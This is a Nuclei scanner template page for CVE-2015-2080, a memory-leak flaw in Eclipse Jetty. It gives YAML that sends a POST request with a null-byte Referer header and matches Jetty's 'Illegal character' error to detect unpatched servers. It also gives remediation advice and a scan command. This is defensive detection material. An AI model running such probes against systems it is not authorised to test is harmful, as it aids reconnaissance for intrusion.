Skip to content
Nuclei Templates

Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage

ID: CVE-2015-2080

Severity: high

Author: pikpikcu

Tags: cve2015,cve,jetty,packetstorm,fedoraproject

Description

Section titled “Description”

Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.

YAML Source

Section titled “YAML Source”
id: CVE-2015-2080


info:
  name: Eclipse Jetty <9.2.9.v20150224 - Sensitive Information Leakage
  author: pikpikcu
  severity: high
  description: Eclipse Jetty before 9.2.9.v20150224 allows remote attackers to obtain sensitive information from process memory via illegal characters in an HTTP header.
  remediation: |
    Upgrade to a version of Eclipse Jetty that is higher than 9.2.9.v20150224 to mitigate this vulnerability.
  reference:
    - https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
    - https://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
    - http://packetstormsecurity.com/files/130567/Jetty-9.2.8-Shared-Buffer-Leakage.html
    - https://nvd.nist.gov/vuln/detail/CVE-2015-2080
    - http://dev.eclipse.org/mhonarc/lists/jetty-announce/msg00074.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2015-2080
    cwe-id: CWE-200
    epss-score: 0.95345
    epss-percentile: 0.99356
    cpe: cpe:2.3:o:fedoraproject:fedora:22:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: fedoraproject
    product: fedora
    shodan-query: cpe:"cpe:2.3:o:fedoraproject:fedora"
  tags: cve2015,cve,jetty,packetstorm,fedoraproject


http:
  - method: POST
    path:
      - "{{BaseURL}}"


    headers:
      Referer: \x00


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Illegal character 0x0 in state"


      - type: status
        status:
          - 400
# digest: 4a0a004730450220433813864df3770e92d05b525f449ebb5e81cfe73ac85f3f0336e8a8be210ffb022100b064988de15f06110859d8bd6900192355662669b324413a18ffdcff6f2de9b4:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-2080.yaml"

View on Github